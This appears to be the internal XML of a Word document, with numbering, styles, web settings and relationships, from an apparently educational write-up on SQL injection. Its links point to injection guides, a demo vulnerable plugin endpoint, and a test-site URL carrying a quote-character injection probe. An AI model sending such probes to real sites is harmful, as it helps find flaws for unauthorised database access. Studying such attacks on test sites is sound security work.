    <w:lvl w:ilvl="6" w:tplc="04090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="7880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="04090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="8600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="04090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="9320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5D850CB9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6906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24FC6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="56F0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A939A6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9F62F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F6932"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="865AC63C"/>
    <w:lvl w:ilvl="0" w:tplc="B2E2238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D1419"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="530E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723FB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2352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965833"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DF3A6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400859"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F560E77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73351778"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2E3C304C"/>
    <w:lvl w:ilvl="0" w:tplc="979814C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5010D0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FD369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3"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="20"/>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D2"/>
    <w:rsid w:val="00024860"/>
    <w:rsid w:val="00092692"/>
    <w:rsid w:val="000A00E5"/>
    <w:rsid w:val="000B1905"/>
    <w:rsid w:val="000C389A"/>
    <w:rsid w:val="000E3036"/>
    <w:rsid w:val="000E6D19"/>
    <w:rsid w:val="000F5773"/>
    <w:rsid w:val="000F79D6"/>
    <w:rsid w:val="00104C5D"/>
    <w:rsid w:val="001503FF"/>
    <w:rsid w:val="00150873"/>
    <w:rsid w:val="00152252"/>
    <w:rsid w:val="00152695"/>
    <w:rsid w:val="001834E1"/>
    <w:rsid w:val="001874B6"/>
    <w:rsid w:val="001942B0"/>
    <w:rsid w:val="001942E3"/>
    <w:rsid w:val="001A2EB8"/>
    <w:rsid w:val="001D0AEE"/>
    <w:rsid w:val="001D6862"/>
    <w:rsid w:val="001E56C2"/>
    <w:rsid w:val="001F182A"/>
    <w:rsid w:val="00227E09"/>
    <w:rsid w:val="002375BC"/>
    <w:rsid w:val="00243FE4"/>
    <w:rsid w:val="00246BB5"/>
    <w:rsid w:val="00264E7E"/>
    <w:rsid w:val="00266478"/>
    <w:rsid w:val="00284EC7"/>
    <w:rsid w:val="002937FE"/>
    <w:rsid w:val="002A0203"/>
    <w:rsid w:val="002A16AD"/>
    <w:rsid w:val="002B6576"/>
    <w:rsid w:val="002C0104"/>
    <w:rsid w:val="002F65BA"/>
    <w:rsid w:val="0030642A"/>
    <w:rsid w:val="00306DEE"/>
    <w:rsid w:val="003122D1"/>
    <w:rsid w:val="00315DFF"/>
    <w:rsid w:val="00326E4F"/>
    <w:rsid w:val="0034245F"/>
    <w:rsid w:val="00357678"/>
    <w:rsid w:val="00386BFA"/>
    <w:rsid w:val="00396667"/>
    <w:rsid w:val="003B4B15"/>
    <w:rsid w:val="003D1F1A"/>
    <w:rsid w:val="003D20F9"/>
    <w:rsid w:val="003E5BE4"/>
    <w:rsid w:val="00404F57"/>
    <w:rsid w:val="004205BD"/>
    <w:rsid w:val="00425AFD"/>
    <w:rsid w:val="00426FAF"/>
    <w:rsid w:val="004306C6"/>
    <w:rsid w:val="00432B73"/>
    <w:rsid w:val="004426DD"/>
    <w:rsid w:val="00466FCF"/>
    <w:rsid w:val="00476356"/>
    <w:rsid w:val="004934B5"/>
    <w:rsid w:val="004A35F7"/>
    <w:rsid w:val="004A5116"/>
    <w:rsid w:val="004B3647"/>
    <w:rsid w:val="004C505C"/>
    <w:rsid w:val="004F6319"/>
    <w:rsid w:val="004F7BA0"/>
    <w:rsid w:val="00506771"/>
    <w:rsid w:val="00513079"/>
    <w:rsid w:val="00525BF1"/>
    <w:rsid w:val="00564E72"/>
    <w:rsid w:val="0058613C"/>
    <w:rsid w:val="005904CD"/>
    <w:rsid w:val="005B1E98"/>
    <w:rsid w:val="005B4E59"/>
    <w:rsid w:val="005D154B"/>
    <w:rsid w:val="005F110A"/>
    <w:rsid w:val="0060786F"/>
    <w:rsid w:val="00612EC6"/>
    <w:rsid w:val="006374F2"/>
    <w:rsid w:val="006533D1"/>
    <w:rsid w:val="006762C2"/>
    <w:rsid w:val="00676D4D"/>
    <w:rsid w:val="00684CDE"/>
    <w:rsid w:val="006D18FF"/>
    <w:rsid w:val="00717693"/>
    <w:rsid w:val="00721411"/>
    <w:rsid w:val="00721B01"/>
    <w:rsid w:val="00750C3F"/>
    <w:rsid w:val="007523D3"/>
    <w:rsid w:val="007726AB"/>
    <w:rsid w:val="00785D75"/>
    <w:rsid w:val="007945E1"/>
    <w:rsid w:val="007A0C3B"/>
    <w:rsid w:val="007B4743"/>
    <w:rsid w:val="007F249B"/>
    <w:rsid w:val="00832B92"/>
    <w:rsid w:val="0085333C"/>
    <w:rsid w:val="00864051"/>
    <w:rsid w:val="00893FBF"/>
    <w:rsid w:val="008D0C1B"/>
    <w:rsid w:val="008F7861"/>
    <w:rsid w:val="00912760"/>
    <w:rsid w:val="00917A35"/>
    <w:rsid w:val="009329E7"/>
    <w:rsid w:val="00940DC1"/>
    <w:rsid w:val="00946410"/>
    <w:rsid w:val="00974A7B"/>
    <w:rsid w:val="00995332"/>
    <w:rsid w:val="009C28DE"/>
    <w:rsid w:val="009C3058"/>
    <w:rsid w:val="009C3C15"/>
    <w:rsid w:val="009D0B3E"/>
    <w:rsid w:val="009E3686"/>
    <w:rsid w:val="009E62E5"/>
    <w:rsid w:val="009E752C"/>
    <w:rsid w:val="009F3C60"/>
    <w:rsid w:val="00A05C5B"/>
    <w:rsid w:val="00A345EA"/>
    <w:rsid w:val="00A47046"/>
    <w:rsid w:val="00A84044"/>
    <w:rsid w:val="00AD1218"/>
    <w:rsid w:val="00AD40F6"/>
    <w:rsid w:val="00AE6725"/>
    <w:rsid w:val="00AF5B91"/>
    <w:rsid w:val="00B01632"/>
    <w:rsid w:val="00B11243"/>
    <w:rsid w:val="00B1561F"/>
    <w:rsid w:val="00B3025C"/>
    <w:rsid w:val="00B55D20"/>
    <w:rsid w:val="00B60925"/>
    <w:rsid w:val="00B639E7"/>
    <w:rsid w:val="00B754CF"/>
    <w:rsid w:val="00B82E17"/>
    <w:rsid w:val="00B90D36"/>
    <w:rsid w:val="00BC38EF"/>
    <w:rsid w:val="00C22B06"/>
    <w:rsid w:val="00C23298"/>
    <w:rsid w:val="00C24729"/>
    <w:rsid w:val="00C31749"/>
    <w:rsid w:val="00C7733A"/>
    <w:rsid w:val="00C77E66"/>
    <w:rsid w:val="00C81C7A"/>
    <w:rsid w:val="00CB4653"/>
    <w:rsid w:val="00CE64AB"/>
    <w:rsid w:val="00CF4499"/>
    <w:rsid w:val="00D055D9"/>
    <w:rsid w:val="00D1531C"/>
    <w:rsid w:val="00D54D5D"/>
    <w:rsid w:val="00D57663"/>
    <w:rsid w:val="00D6191C"/>
    <w:rsid w:val="00D62A47"/>
    <w:rsid w:val="00D75926"/>
    <w:rsid w:val="00D80AEB"/>
    <w:rsid w:val="00D9653D"/>
    <w:rsid w:val="00DA3AE3"/>
    <w:rsid w:val="00DB65D9"/>
    <w:rsid w:val="00DF1EFE"/>
    <w:rsid w:val="00E06ED2"/>
    <w:rsid w:val="00E12DC7"/>
    <w:rsid w:val="00E15BFB"/>
    <w:rsid w:val="00E162B2"/>
    <w:rsid w:val="00E57DFD"/>
    <w:rsid w:val="00E73003"/>
    <w:rsid w:val="00EB450E"/>
    <w:rsid w:val="00EB489B"/>
    <w:rsid w:val="00ED42F8"/>
    <w:rsid w:val="00EF4736"/>
    <w:rsid w:val="00F40025"/>
    <w:rsid w:val="00F653D3"/>
    <w:rsid w:val="00F97662"/>
    <w:rsid w:val="00FC5CBE"/>
    <w:rsid w:val="00FD79D2"/>
    <w:rsid w:val="00FE24ED"/>
    <w:rsid w:val="00FE417B"/>
    <w:rsid w:val="00FE62ED"/>
    <w:rsid w:val="00FE73A5"/>
    <w:rsid w:val="00FE759D"/>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C0D9C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0D9F753D-86C8-4482-AA6D-5E3F7717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D75"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>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785D75"/>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1F182A"/>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396667"/>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152695"/>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D75"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00FE759D"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00785D75"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00785D75"/>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D75"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:spacing w:val="-10"/>
      <w:kern w:val="28"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007523D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523D3"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007523D3"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="well">
    <w:name w:val="well"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="007523D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F182A"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-tab-span">
    <w:name w:val="apple-tab-span"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00284EC7"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0032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E4F"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0032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E4F"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="001D6862"/>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D6862"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001D6862"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="260"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001D6862"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="520"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00396667"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:iCs/>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00152695"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00396667"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="780"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC5">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000A00E5"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="1040"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00306DEE"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:rsid w:val="001E56C2"/>
    <w:pPr>
      <w:spacing w:after="140" w:line="276" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:eastAsia="Noto Sans CJK SC" w:hAnsi="Liberation Serif" w:cs="Lohit Devanagari"/>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-AU" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextChar">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText"/>
    <w:rsid w:val="001E56C2"/>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:eastAsia="Noto Sans CJK SC" w:hAnsi="Liberation Serif" w:cs="Lohit Devanagari"/>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>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88801">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="218514204">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="240602408">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="678436061">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="680472412">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="716589260">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="846361670">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1084843954">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1271740854">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1347439887">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1444227774">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1644698058">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1803377584">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="18754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stphp.vulnweb.com/listproducts.php?cat=1"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cunetix.php.example/wordpress/wp-content/plugins/demo_vul/endpoint.php" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.acunetix.com/websitesecurity/sql-injection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s://www.acunetix.com/blog/articles/exploiting-sql-injection-example/?utm_source=hacksplaining&amp;utm_medium=post&amp;utm_campaign=articlelin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cunetix.php.example/wordpress/wp-content/plugins/demo_vul/endpoint.php" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/?utm_source=hacksplaining&amp;utm_medium=post&amp;utm_campaign=articlelink"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estphp.vulnweb.com/listproducts.php?cat=1%27" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://acunetix.php.example/wordpress/wp-content/plugins/demo_vul/endpoint.php" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.netsparker.com/blog/web-security/sql-injection-vulnerability/"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www.hacksplaining.com/prevention/sql-inj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acunetix.php.example/wordpress/wp-content/plugins/demo_vul/endpoint.php"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acunetix.com/websitesecurity/sql-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3A79-4CC1-4BB3-A680-95846EE3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3</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Hoang</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Tien Hoang</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-06-07T04:33:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-06-12T16:06:00Z</dcterms:modified>
</cp:coreProperties>
</file>